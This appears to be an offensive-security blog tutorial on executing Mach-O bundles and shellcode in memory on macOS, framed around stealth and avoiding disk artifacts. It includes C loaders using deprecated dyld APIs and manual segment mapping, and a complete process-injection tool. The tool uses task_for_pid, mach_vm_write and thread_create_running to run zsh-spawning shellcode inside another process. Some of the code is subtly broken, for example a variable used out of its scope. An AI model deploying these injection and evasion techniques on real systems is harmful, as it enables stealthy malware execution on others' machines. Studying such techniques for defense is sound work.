Executing Mach-Os In-Memory

In-memory execution in macOS-yes, it is a thing too. Sometime ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

The term in-memory execution means running your executable code is executed right in memory without actually being written as a physical file on disk. As with any operating system, the trick is in dynamic loading. Different is the in-memory process image and its image on disk; you cannot just copy a file into memory and directly execute it. Instead, you would use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule, which handle the creation of the in-memory mapping and linking, already deprecated since macOS Catalina.

I found this example here bundle-memory-load/main.c, which basically load the binary or bundle into a region of memory,

But before we cover it, we need to know what a Mach-O file is, I’ll follow this Reference check it out, Alright, Mach-O file is the standard file format for executables, object code, shared libraries, and core dumps in macOS and iOS. It is a very structured binary format in which instructions and data to run code are stored, and there are several types of them depending on how the code should be used:

Executable: This contains code and data for running a program.
Dynamic Library: dylib Shared code usable by several programs.
Bundle (.bundle): A bundle gathers code that can be loaded dynamically at runtime, such as in the case of our tutorial.

The Mach-O format consists of headers, load commands, and segments. Each of the above pieces specifies what kind of executable code, how memory is laid out, and what linkage information the loader needs at runtime. Each segment may contain executable code, initialized data, and metadata. The dynamic linker-dyld-uses this metadata to map the file into memory, resolve symbols, and execute it.

Of course, each segment has different information that comprises a Mach-O file. In general, these are the __TEXT segment of the executable code and the __DATA segment of the global variables.

MH_MAGIC_64   X86_64   ALL LIB64   EXECUTE
ncmds=16  sizeofcmds=1544
flags: NOUNDEFS DYLDLINK TWOLEVEL PIE

LC_SEGMENT_64 __PAGEZERO
vmaddr  0x0
vmsize  0x100000000  (4 GB)
fileoff 0
filesize 0

segments can be very important to understand in terms of exactly how the loading of the binary takes place, as well as how it functions once it is already in memory.

The most relevant to our format is the bundle format. A bundle is a type of dynamic library, that can be loaded at runtime, and dyld has the important job of linking and running it. When dyld processes the Mach-O headers and load commands, it maps the respective file sections into memory, sets proper permissions like READ, EXECUTE, or READ/WRITE, and resolves all required symbols before passing control to the program’s entry point.

Now let’s discuss in a little more detail what dyld does. dyld is responsible for loading Mach-O files into memory and resolving their dependencies at runtime. It does this by parsing the file’s load commands, which tell dyld what segments need to be mapped into memory, what libraries need to be linked, and what symbols need to be resolved. This is precisely what happens when an executable or bundle is loaded from disk.

But for complete in-memory code execution, without spilling any payloads on disk, we have to implement what gets done by dyld. Instead of relying on dyld to load the file off disk, we can manually load the Mach-O bundle into memory and do everything dyld normally does. That includes mapping the segments into memory, setting permissions, and resolving symbols.

Here’s an post by Adam Chester of how to patch dyld to load Mach-O bundles completely in memory, which allows us never to have to touch the disk. It’s a cool technique that enables us not to leave any kind of artifact on the disk, hence this is pretty useful for stealth.

When dyld loads a Mach-O file, it reads the header to understand the general layout of the file and then processes the load commands, working out how to map in the different segments. These segments are then mapped with appropriate permissions; for example, the __TEXT segment is normally marked executable, while the __DATA segment is marked as writable. Finally, dyld performs the symbol resolution and transfers control to the entry point, executing the code.

We can load and execute Mach-O files completely in memory by emulating this process, without the need to write anything to disk. That’s exactly what our example does: it opens a Mach-O bundle, maps it into memory, creates an object file image, links the module, resolves the symbol for the function we want to execute, and finally calls that function, I’m repeating myself here :)

Now that we understand the inner workings of Mach-O files and how dyld processes them, let’s move forward with actual examples that tie together everything we’ve discussed. The goal is to demonstrate how we can emulate dyld’s behavior in loading and executing Mach-O bundles entirely in memory, avoiding the need to write payloads to disk.

check out this piece of code that loads a Mach-O bundle into memory, maps the necessary segments, resolves symbols, and then calls a function from the bundle. In this example, we assume that the Mach-O bundle contains a function called _execute, which we will invoke after loading the bundle in memory.

// MachODynamicLoader.c
// Dynamically loads and executes a Mach-O bundle (_execute symbol).
// Uses dyld APIs to memory-map, link, resolve, and call.

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY); // open file
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    // map Mach-O file
    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    // create object file image
    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    // link module
    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // resolve "_execute" symbol
    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE), 
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // call resolved symbol
    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    // cleanup
    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

Here, we’ve essentially emulated the operations that dyld performs to load and execute Mach-O files, but we do everything in memory. Ordinarily, dyld parses the Mach-O from disk, maps the segments into memory, resolves symbols, and transfers control to the executable code. By mapping the file directly into memory ourselves, we bypass dyld, handling the linking and symbol resolution manually, thus completing the process entirely in memory.

However, remember that these methods have been deprecated since macOS Catalina. They technically worked on older operating systems, but Apple no longer supports them, and modern systems may prevent their use in newer applications. In contemporary macOS, particularly, many of these functions are either heavily sandboxed or entirely blocked in environments where System Integrity Protection (SIP) is enabled.

Since 10.15, dynamic loading via the dlopen family of functions has been the preferred approach: dlopen, dlsym, dlclose. This allows for dynamic loading at runtime, symbol resolution, and unloading of libraries. However, dlopenstill expects a file on disk. For purely in-memory execution, we need to manually parsing Mach-O headers and setting up memory regions with mmap, mimicking dyld’s operations.

Hardened Runtime

Now, Let’s expand our example to include another method for in-memory loading using completely non-deprecated functions,

// MachOLoader.c 
// Loads, resolves, and executes _execute from a Mach-O bundle 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/loader.h>
#include <mach-o/nlist.h>

void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb; if (fstat(fd, &sb) < 0) { close(fd); return; }
    void *codeAddr = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); close(fd);
    if (codeAddr == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)codeAddr;
    if (header->magic != MH_MAGIC_64) return munmap(codeAddr, sb.st_size), 0;

    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            void *segAddr = mmap((void *)segCmd->vmaddr, segCmd->vmsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (segAddr == MAP_FAILED) { munmap(codeAddr, sb.st_size); return; }
            memcpy(segAddr, codeAddr + segCmd->fileoff, segCmd->filesize);
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    struct symtab_command *symTabCmd = NULL; loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SYMTAB) { symTabCmd = (struct symtab_command *)loadCmd; break; }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    if (symTabCmd) {
        struct nlist_64 *symTbl = (struct nlist_64 *)(codeAddr + symTabCmd->symoff);
        char *strTbl = (char *)(codeAddr + symTabCmd->stroff);
        for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
            if (strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
                ((void (*)())(segAddr + symTbl[i].n_value))();
            }
        }
    }
    munmap(codeAddr, sb.st_size);
}

int main() { load_macho("test.bundle"); return 0; }

The logic is: we create a function called load_macho, accepting as an argument the path to the Mach-O. It opens the file, checks the size of the file, and then memory maps it into our processes’ address space. Then we check that a Mach-O header is indeed a 64-bit file, and we iterate through its load commands to map all the needed segments into executable memory.

Finally, we manually handle symbol resolution by searching the _execute symbol in the symbol table and calling it if found. In this manner, we are effectively proving how in-memory execution would be able to take place without writing anything on the disk.

Alternative approach, we highlight another way of performing in-memory execution by injecting and executing shellcode directly. For this, you can refer back to the earlier part where we discussed writing 64-bit assembly shellcode for macOS. That shellcode can then be converted into machine code and staged in memory using techniques like mmap and mprotect.

Here’s how you can showcase a simple stager dropper that executes a small payload (shellcode) to download or pull in another payload into memory. The downloaded payload is then executed directly from memory using Mach-O format techniques, as we discussed earlier.

We simulates downloading the payload into memory, but instead of downloading it over the network, we use a hardcoded shellcode. The is just a small snippet of machine code that prints “Hello World”. and mmap() to allocate memory with READ/WRITE permissions, then copy the shellcode into this allocated space.

Next, we use mprotect() to change the memory permissions to READ/EXECUTE, making it executable. Finally, run_payload() executes the shellcode directly from memory by casting the memory pointer to a function pointer and calling it.

Virtual Memory Map of process 1195 (PayloadStager)
Output report format: 2.4  -- 64-bit process
VM page size: 4096 bytes

==== Non-writable regions for process 1195
REGION TYPE                 START - END            [ VSIZE  RSDNT  DIRTY   SWAP] PRT/MAX SHRMOD PURGE    REGION DETAIL
__TEXT                      105899000-10589d000    [   16K    16K     0K     0K] r-x/r-x SM=COW          /Users/USER/*/PayloadStager
__DATA_CONST                10589d000-1058a1000    [   16K    16K     4K     0K] r--/rw- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a5000-1058a9000    [   16K     4K     0K     0K] r--/r-- SM=COW|NUL      /Users/USER/*/PayloadStager
dyld private memory         1058a9000-1059a9000    [ 1024K    12K    12K     0K] r--/rwx SM=PRV
shared memory               1059ab000-1059ad000    [    8K     8K     8K     0K] r--/r-- SM=SHM
MALLOC metadata             1059ad000-1059c0000    [   12K    12K    12K     0K] r--/rwx SM=ZER|PRV
MALLOC guard pages          1059b2000-1059be000    [   16K     0K     0K     0K] ---/rwx SM=ZER|NUL

As expected, the executable code resides in the __TEXT segment, which has r-x permissions. This indicates that the memory is readable and executable, but not writable, as is typical for code segments.

We note, that the dyld private memory area has both writable and executable permissions: rwx. It means memory was previously mapped as being writable and afterwards became executable. This indeed shows from the r--/rwx permissions in the dyld private memory region. and the process-specific memory by the attribute string SM=PRV, which corroborates what would have been the case when using mmap for shellcode execution, shown in this code.

and if we follow this closely, as we can see system call allocates memory at address 0x10EA93000 with an initial set of permissions. The PROT_READ | PROT_WRITEflag (0x1) allows for reading and writing to the allocated memory.

and also The mprotect system call is used to modify the memory permissions. In this case, the memory at address 0x10EA95000 is changed from writable to executable (PROT_READ | PROT_EXEC, represented by 0x3).

and Finally, the 0x5 indicates PROT_READ | PROT_EXEC (execute permission is being granted), which allows the payload to run from this memory region.

This of course the most basic, naive way, if we wanna play a little we can introduce payload into the memory of another process using the Mach VM API, follow the same principle’s. but hy you can use maybe task_for_pid but make sure have privileges.

To give you an idea, maybe I don’t know, just allocate some memory, drop the shellcode in, make it executable, and let it run. Something like this: First, we grab the target process’s memory using mach_vm_allocate. We want to reserve a chunk of space that can hold our shellcode. This is where our executable code will live. Once we have the space, we proceed to write the shellcode into that memory region with mach_vm_write. At this stage, make sure that the shellcode is properly laid out in memory for execution.

Next, we set the memory protections with mach_vm_protect, making it executable. This allows our shellcode to run without hitting any access violations. Now, with the shellcode in place and ready to execute, need to create a thread within the target process. this can be done with thread_create_running, pointing the program counter to our shellcode’s address and setting the stack pointer appropriately.

Source : MachExec

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>

#define PAGESIZE sysconf(_SC_PAGESIZE)

unsigned char shellcode[] = {
    0x48, 0x31, 0xd2,             // xor    rdx, rdx
    0x52,                         // push   rdx
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x7a, 0x73, 0x68,  // mov    rbx, '/bin/zsh'
    0x53,                         // push   rbx
    0x48, 0x89, 0xe7,             // mov    rdi, rsp 
    0x48, 0x31, 0xc0,             // xor    rax, rax
    0x66, 0xb8, 0x2d, 0x63,       // mov    ax, 0x632d
    0x50,                         // push   rax
    0x48, 0x89, 0xe3,             // mov    rbx, rsp 
    0x52,                         // push   rdx (null)
    0xeb, 0x0f,                   // jmp    0x0f
    0x53,                         // push   rbx
    0x57,                         // push   rdi
    0x48, 0x89, 0xe6,             // mov    rsi, rsp
    0x6a, 0x3b,                   // push   0x3b 
    0x58,                         // pop    rax 
    0x48, 0x0f, 0xba, 0xe8, 0x19, 0x0f, 0x05, // (execve)
    0xe8, 0xec, 0xff, 0xff, 0xff,  
    0x6f, 0x70, 0x65, 0x6e, 0x20, 0x2d, 0x61, 0x20, 
    0x43, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 
    // 0x90, 0x90, 
    0x6f, 0x72, 0x00,       // '/bin/zsh -a calculator'        
    0x52
};

void die(const char *m) { perror(m); exit(1); }
void wht(const char *f, ...) { va_list a; va_start(a, f); vfprintf(stderr, f, a); va_end(a); }

mach_vm_address_t alloc(task_t t, size_t s) {
    mach_vm_address_t a = 0;
    if (mach_vm_allocate(t, &a, s, VM_FLAGS_ANYWHERE) != KERN_SUCCESS) die("alloc");
    return a;
}

void write_mem(task_t t, mach_vm_address_t a, void *d, size_t s) {
    if (mach_vm_write(t, a, (vm_offset_t)d, s) != KERN_SUCCESS) die("write");
}

void make_exec(task_t t, mach_vm_address_t a, size_t s) {
    if (mach_vm_protect(t, a, s, FALSE, VM_PROT_READ | VM_PROT_EXECUTE) != KERN_SUCCESS) die("protect");
    wht("[+] RX at 0x%llx\n", a);
}

void create_th(task_t t, mach_vm_address_t rip, mach_vm_address_t rsp) {
    x86_thread_state64_t s = {0};
    s.__rip = (uint64_t)rip;
    s.__rsp = (uint64_t)rsp;
    
    thread_act_t th;
    if (thread_create_running(t, x86_THREAD_STATE64, (thread_state_t)&s, x86_THREAD_STATE64_COUNT, &th) != KERN_SUCCESS)
        die("thread");
    wht("[+] RIP=0x%llx RSP=0x%llx\n", rip, rsp);
}

int main(int argc, char *argv[]) {
    if (argc != 2) { 
        fprintf(stderr, "Usage: %s <pid>\n", argv[0]);
        return 1; 
    }

    task_t target;
    pid_t pid = atoi(argv[1]);
    if (task_for_pid(mach_task_self(), pid, &target) != KERN_SUCCESS) die("task_for_pid");

    wht("[+] Got task %d\n", pid);
    size_t shellcode_size = sizeof(shellcode);

    mach_vm_address_t shellcode_addr = alloc(target, shellcode_size);
    write_mem(target, shellcode_addr, shellcode, shellcode_size);
    make_exec(target, shellcode_addr, shellcode_size);

    mach_vm_address_t stack_addr = alloc(target, PAGESIZE);
    create_th(target, shellcode_addr, stack_addr + PAGESIZE);

    wht("[+] ~;~\n");
    return 0;
}

Regardless of what the shellcode does, the flow remains similar: allocate memory, write the code, make it executable, set up the env, and then execute it.

if you somehow jumped directly here, The code uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(), which macOS restricts to processes with admin rights thanks to SIP, of course. We launch the executable using lldb, the debugger. which confirms that the stack memory was also allocated, setting up the env for our shellcode, you can debug it more.